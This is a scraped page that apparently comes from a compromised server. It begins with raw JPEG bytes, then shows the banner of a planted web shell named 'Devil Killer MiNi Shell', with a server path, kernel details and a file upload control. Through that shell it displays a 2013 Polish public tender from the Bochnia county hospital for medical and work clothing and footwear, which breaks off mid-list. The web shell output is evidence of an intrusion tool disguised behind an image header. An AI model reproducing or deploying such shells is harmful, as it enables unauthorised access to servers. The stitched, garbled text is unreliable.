JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130524/88127-N-2013.html

<p class="kh_header"><b>Bochnia: Dostawa odzieży i obuwia profilaktycznego dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej</b><br>
<b>Numer ogłoszenia: 88127 - 2013; data zamieszczenia: 24.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni "Szpital Powiatowy" im. bł. Marty Wieckiej , ul. Krakowska 31, 32-700 Bochnia, woj. małopolskie, tel. 14 6153201, 6153233, 50979196, faks 14 6153202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bochnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odzieży i obuwia profilaktycznego dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa odzieży i obuwia profilaktycznego dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej opisanych w sposób szczegółowy w załączniku nr 3 SIWZ
2.	Przedmiot zamówienia został podzielony według następujących pakietów
Pakiet nr 1 - Odzież  dla personelu medycznego i gastronomicznego
Pakiet nr 2 - Obuwie profilaktyczne 
Pakiet nr 3 - Odzież operacyjna barierowa
Pakiet nr 4 - Odzież operacyjna bawełniana 
Pakiet nr 5 - Obuwie operacyjne  
Pakiet nr 6 - Ubranie robocze, obuwie robocze.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 35.11.34.00-3, 18.83.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca przedstawi oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Katalogi, foldery, prospekty, ulotki informacyjne zawierające zdjęcie-wzór każdego z oferowanego asortymentu będącego przedmiotem dostawy. Każde zdjęcie powinno być oznakowane w sposób umożliwiający jego dopasowanie do poszczególnych pozycji Formularza Asortymentowo-Cenowego (Załącznik Nr 3 do SIWZ) tj. nr pakietu i nr pozycji.
Certyfikat potwierdzający zgodność gotowych wyrobów z Polską Normą PN-P 84525:1998 wystawiony przez jednostkę notyfikowaną lub Deklaracje Zgodności producenta potwierdzające zgodność gotowych wyrobów z Polską Normą PN-P 84525:1998 dla pakietu nr 1, 4
Karty charakterystyki parametrów użytkowych tkaniny lub Świadectwa jakości tkaniny, z której wykonany będzie przedmiot zamówienia, potwierdzające wymagane parametry tkaniny: skład materiału, gramaturę, temperaturę prania, stopień kurczliwości tkaniny dla pakietu nr 1 
Oświadczenie Wykonawcy o dopuszczeniu wyrobów medycznych do obrotu i stosowania na terenie Polski dla pakietu nr 3, 5 (można skorzystać z  załącznika nr 5 )
Certyfikat potwierdzający zgodność gotowych wyrobów z Polską Normą PN-EN 13795 wystawiony przez jednostkę notyfikowaną lub Deklaracje Zgodności producenta potwierdzające zgodność gotowych wyrobów z Polską Normą  PN-EN 13795 lub równoważną dla pakietu nr 3
Karta techniczna tkaniny wystawiona przez  producenta tkaniny dla pakietu nr 3
Dokument potwierdzający wymagany poziom przepuszczalności powietrza dla pakietu nr 3
Certyfikat potwierdzający zgodność gotowych wyrobów z Dyrektywą medyczną 93/42 wystawiony przez jednostkę notyfikowaną lub Deklaracje Zgodności producenta potwierdzające zgodność gotowych wyrobów z Dyrektywą medyczną 93/42 dla pakietu nr 5
Deklaracje Zgodności wystawione przez producenta potwierdzające zgodność oferowanego obuwia z Polską Normą PN-EN ISO 20347:2005- Środki ochrony indywidualnej-Obuwie zawodowe dla pakietu nr 2, pakietu nr 6 poz. 6
Ocena spełnienia warunków w zakresie potwierdzenia, że oferowane dostawy odpowiadają określonym wymaganiom dokonana zostanie wg formuły: spełnia/ nie spełnia.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwa. W przypadku udzielenia pełnomocnictwa, wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. Kserokopia pełnomocnictwa musi być poświadczona przez notariusza.
2.	W przypadku gdy, Wykonawca powołuje się na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia lub zdolności finansowe innych podmiotów - pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z określeniem zakresu udzielanych zasobów. Dokument  należy przedstawić w formie oryginału.
3.	Pełnomocnictwo do reprezentowania konsorcjum w postępowaniu o udzielenie zamówienia publicznego lub do reprezentowania w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy - w przypadku wykonawców wspólnie ubiegający się o udzielenie. Kserokopia pełnomocnictwa musi być poświadczona przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy z zastrzeżeniem art. 144 ust. 1 ustawy mogą być dokonywane za zgodą obu Stron, wyrażoną na piśmie, pod rygorem nieważności 
2.	Strony dopuszczają zmiany w umowie w następującym zakresie:
a.	danych identyfikujących strony umowy, takich jak np. firma, adresu siedziby lub inne zapisy dotyczące wskazania stron. 
b.	obniżenia cen jednostkowych w każdym czasie trwania umowy
c.	zmiany stawek podatków
d.	nazwy handlowej przedmiotu zamówienia przy zachowaniu jego parametrów na poziomie takim samym lub wyższym</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bochnia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej, ul.  Krakowska 31, 32-700 Bochnia
Dział Zaopatrzenia I Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2013 godzina 13:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Bochni przy ul. Krakowskiej 31 na Dzienniku podawczym - sekretariat, Pawilon A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Odzież  dla personelu medycznego i gastronomicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Bluza damska lub  męska - krój klasyczny prosty, modelujący sylwetkę, rękaw długi lub krótki (do wyboru w trakcie składania zamówienia), zapięcia na  zatrzaski metalowe nierdzewne, wykończenie dekoltu-wykładany kołnierz lub stójka. Tkanina: 50% bawełna  50% poliester (+/- 15%), temperatura prania 90° gramatura  180 /m2, kurczliwość do 1,5%. Kolor do wyboru w trakcie składania zamówienia, oblamówki przy kieszeniach  i rękawach, różne rozmiary 	390	szt.
2.	Spodnie damskie  lub męskie, nogawki długie, proste, krój klasyczny z paskiem, po bokach regulacja obwodu pasa(gumki). Tkanina: 50% bawełna/ 50% poliester (+/- 15%), temperatura prania 90° gramatura  180 /m2, kurczliwość do 1,5%. Kolor do wyboru w trakcie składania zamówienia,  różne rozmiary 	310	szt.
3.	Spódnica  -  krój klasyczny z paskiem, po bokach regulacja obwodu pasa( gumki), zapięcie na zamek i guzik, małe rozcięcie z tyłu. Tkanina 50%bawełna /50% poliester (+/- 15%), atestowana temperatura prania 90°, gramatura  180 /m2, kurczliwość do 1,5%. Kolor do wyboru w trakcie składania zamówienia, różne rozmiary 	80	szt.
4.	Fartuch damski   lub męski  - krój klasyczny prosty, modelujący sylwetkę, rękaw długi lub krótki (do wyboru w trakcie składania zamówienia), zapinany z przodu, zapięcia na  zatrzaski metalowe nierdzewne, wykończenie dekoltu-wykładany kołnierz.  Tkanina: 50% bawełna  50% poliester (+/- 15%), temperatura prania 90°, gramatura  180 /m2, kurczliwość do 1,5%. Kolor do wyboru w trakcie składania zamówienia, oblamówki przy kieszeniach  i rękawach, różne rozmiary 	95	szt.
5.	Czepek kucharski - bawełniano-tiulowy, z siateczką ochronną, z tyłu regulowany gumką 	50	szt.
6.	Zapaska kucharska - tkanina 50% poliester, 50% bawełna (+/-15%), gramatura 180-210g/m2, długość dostosowana do sylwetki. 	26	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.34.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Obuwie profilaktyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Obuwie profilaktyczne: damskie lub męskie z zakrytym czubkiem i paskiem pięty z możliwością regulacji, profilem ortopedycznym i bieżnikiem antypoślizgowym, wierzch - skóra  biała o trwałym wykończeniu umożliwiającym zmywanie i dezynfekcję, wyściółka ze skóry naturalnej impregnowanej antybakteryjnie i przeciwgrzybicznie, różne rozmiary.	400	para.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.83.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Odzież operacyjna barierowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Fartuch chirurgiczny barierowy wielokrotnego użytku wykonany z tkaniny niepylącej, poliestrowej z dodatkiem włókna węglowego, z dobrymi właściwościami termoregulacyjnymi, z wysokim poziomem para przepuszczalności, zgodnej z normą PN-EN 13795,  nie wymagający impregnacji,  konserwacji i  teflonowania  w  trakcie użytkowania. Na obszarze krytycznym fartuch wykonany z pojedynczej pogrubionej lub podwójnej warstwy tkaniny poliestrowej o gramaturze min134 g/m2.  Poza obszarem krytycznym fartuch wykonany z pojedynczej, cieńszej warstwy tkaniny poliestrowej o gramaturze 70-135 g/m2.  Fartuch rekomendowany do zabiegów średnio inwazyjnych. Obie tkaniny w jednolitym odcieniu  Szew łączący poszczególne elementy tkaniny kryty, zawijany. Kolor niebieski. Poły fartucha zakładane na siebie i wiązane na troki lub u góry na napy. Stała możliwość rozdzielenia troków do wiązania zewnętrznego i wewnętrznego. Ściągacz poliestrowy przy rękawach i szyi. System znakowania kolejnych cykli prania. Fartuch zachowuje pełną barierowość przez okres 100 cykli (pranie, suszenie, sterylizacja) Sterylizacja parowa, Rozmiar XL 25 szt.
2.Ubranie operacyjne barierowe, bluza + spodnie, wielokrotnego użytku, wykonany z tkaniny niepylącej, bawełniano poliestrowej  o min. zawartości bawełny 54%, o gramaturze 120-125g/m2, Dopuszcza się domieszkę włókna węglowego 1-1,5%, z poziomem przepuszczalności powietrza min. 50 cm3/cm2, zgodne z normą PN-EN 13795 w zakresie pylenia i czystości pod wzgl. cząstek stałych, bluza wycięta w serek, trzy kieszenie, spodnie na gumkę w pasie, wiązane z przodu na troki. Kolor zielony. zarówno buza jaki spodnie oznakowane napisem Blok Operacyjny: Rozmiar XL-XXL 70 szt.
3.Sukienka operacyjna barierowa wielokrotnego użytku , wykonany z tkaniny niepylącej, bawełniano poliestrowej  o min. zawartości bawełny 54%, o gramaturze 120-125g/m2, Dopuszcza się domieszkę włókna węglowego 1-1,5%. , z poziomem przepuszczalności powietrza min. 50 cm3/cm2, zgodne z normą PN-EN 13795 w zakresie pylenia i czystości pod wzgl. cząstek stałych. Krój prosty, dekolt w serek, trzy kieszenie. Kolor zielony. Oznakowane napisem Blok Operacyjny Rozmiar XL-XXL. 10 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.34.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Odzież operacyjna bawełniana.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Bluza różne rozmiary kolor niebieski  tkanina typu medical gramatura 190g/m2, barwienie kadziowe odporne na chlorowanie, sterylizację oraz częste pranie	40	szt.
2.	Spodnie różne rozmiary kolor  niebieski  tkanina typu medical gramatura 190g/m2, barwienie kadziowe odporne na chlorowanie, sterylizację oraz częste pranie	40	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.34.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - Obuwie operacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Obuwie operacyjne  wykonane z SEBS (styreno-etyleno-butadieno-styrenu) o podwyższonej odporności na degradację i starzenie, elastyczne, wentylowane z góry, i po bokach, z wyjmowana perforowna wkładką masująca podlegającą sterylizacji. Podeszwa antyposlizgowa, posiadająca antystatyczny korek, rozmiary od 35-46, kolor: zielony, bordowy, biały, niebieski, zgodne z Dyrektywą medyczną 93/42 lub równoważną 	25	para.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.83.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - Ubranie robocze, obuwie robocze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Bluza robocza, tkanina poliester 56%, bawełna 35%, gramatura 270 g   ( +/- 10%) m2 zmin. 3 kieszeniami zewn., + kieszeń wewn., kieszeń na klatce piersiowej z patką, bluza zasuwana na kryty suwak lub metalowe zatzraski, kołnierz stójka lub wykładany, rękawy wykanczone mankietem zapinanym na guziki lub zatrzaski, dół bluzy z wykończeniem umożliwiającym regulacje obwodu. Kolor: niebieski.	6	szt
2.	Spodnie robocze typu ogrodniczki, tkanina poliester 65%, bawełna 35%, gramatura 270 g( +/- 10%) m2, spodnie na szelki typu ogridniczki, zapinane w pasie na guzik lub metalowy zatrzask, szelki zapinane na zapiecia z twozrywa sztucznego, rozporek zapinany na suwak, kolana wzmocnione podwójną tkanina, kieszenie min. 4 w tym jedna na piersi i jedna na nodze na wysokości kolana.	6	szt
3.	Kurtka ocieplana męska, kurtka zimowa o dł. 3/4 ocieplana, pokryta tkaniną wodoodporną , z kołnierzem wykładanym, zapinana na suwak, rękaw zakończony wewn. ściągaczem, dwie kieszenie na zewnątrz, jedna wewnątrz. Kolor: granatowy lub stalowy. 	7	szt
